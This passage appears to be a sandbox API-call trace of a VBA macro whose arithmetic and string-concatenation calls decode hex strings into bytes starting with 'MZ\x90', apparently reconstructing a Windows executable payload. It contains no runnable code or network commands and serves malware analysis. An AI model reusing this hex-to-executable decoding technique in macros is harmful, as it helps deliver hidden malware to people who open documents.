pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.105] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.105] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.105] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.105] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.105] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.105] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.105] VarBstrCat (in: bstrLeft="", bstrRight="4D5A90", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.105] VarBstrCat (in: bstrLeft="&H", bstrRight="4D", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.106] VarBstrCat (in: bstrLeft="&H", bstrRight="5A", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.106] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.106] VarBstrCat (in: bstrLeft="&H", bstrRight="90", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.106] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.106] VarBstrCat (in: bstrLeft="", bstrRight="MZ\x90", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.106] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.106] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.106] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.107] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.107] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.107] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.107] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.107] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.107] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.107] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.108] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.108] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.108] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.108] VarBstrCat (in: bstrLeft="000", bstrRight="300", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.108] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.108] VarBstrCat (in: bstrLeft="&H", bstrRight="03", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.108] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.108] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.108] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.108] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.109] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.109] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.109] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.109] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.109] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.109] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.109] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.109] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.110] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.110] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.110] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.110] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.110] VarBstrCat (in: bstrLeft="00000", bstrRight="4", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.110] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.110] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.110] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.110] VarBstrCat (in: bstrLeft="&H", bstrRight="04", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.110] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.111] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.111] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.111] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.111] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.111] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.111] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.111] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.111] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.111] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.112] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.112] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.112] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.112] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.112] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.112] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.112] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.112] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.112] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.112] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.112] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.113] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.113] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.113] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.113] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.113] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.113] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.113] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.113] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.113] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.113] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.113] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.113] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.113] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.114] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x0 [0203.114] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.114] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.114] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.114] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.114] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.114] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.114] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.114] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.114] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.114] VarBstrCat (in: bstrLeft="", bstrRight="FFFF00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.114] VarBstrCat (in: bstrLeft="&H", bstrRight="FF", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.114] VarBstrCat (in: bstrLeft="&H", bstrRight="FF", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.114] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.115] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.115] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.115] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="ÿÿ", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.115] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.115] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.115] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.115] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.115] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.115] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.115] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.116] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.116] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.116] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.116] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.116] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.116] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.116] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.116] VarBstrCat (in: bstrLeft="00", bstrRight="B800", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.116] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.117] VarBstrCat (in: bstrLeft="&H", bstrRight="B8", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.117] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.117] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.117] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.117] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.117] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.117] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.117] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.117] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.117] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.118] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.118] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.118] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.118] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.118] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.118] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.118] VarSub (in: pvarLeft=0xa025ef0, pvarRight=0xa025ed8, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.118] VarBstrCat (in: bstrLeft="00000", bstrRight="0", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.119] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.119] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.119] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.119] VarBstrCat (in: bstrLeft="&H", bstrRight="00", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.119] VarAdd (in: pvarLeft=0xa025d70, pvarRight=0xa025cc8, pvarResult=0xa025c98 | out: pvarResult=0xa025c98) returned 0x0 [0203.119] VarBstrCat (in: bstrLeft="MZ\x90", bstrRight="", pbstrResult=0x1ddeb0 | out: pbstrResult=0x1ddeb0) returned 0x0 [0203.119] VarAdd (in: pvarLeft=0xa025e60, pvarRight=0xa025dd0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.119] VarCmp (pvarLeft=0xa025db8, pvarRight=0xa025ef0, lcid=0x0, dwFlags=0x30001) returned 0x2 [0203.120] VarSub (in: pvarLeft=0xa025ed8, pvarRight=0xa025ef0, pvarResult=0xa025ec0 | out: pvarResult=0xa025ec0) returned 0x0 [0203.120] VarMul (in: pvarLeft=0xa025ef0, pvarRight=0xa025d88, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarAdd (in: pvarLeft=0xa025cf8, pvarRight=0xa025da0, pvarResult=0xa025ed8 | out: pvarResult=0xa025ed8) returned 0x0 [0203.120] VarAdd (in: pvarLeft=0xa025e60, 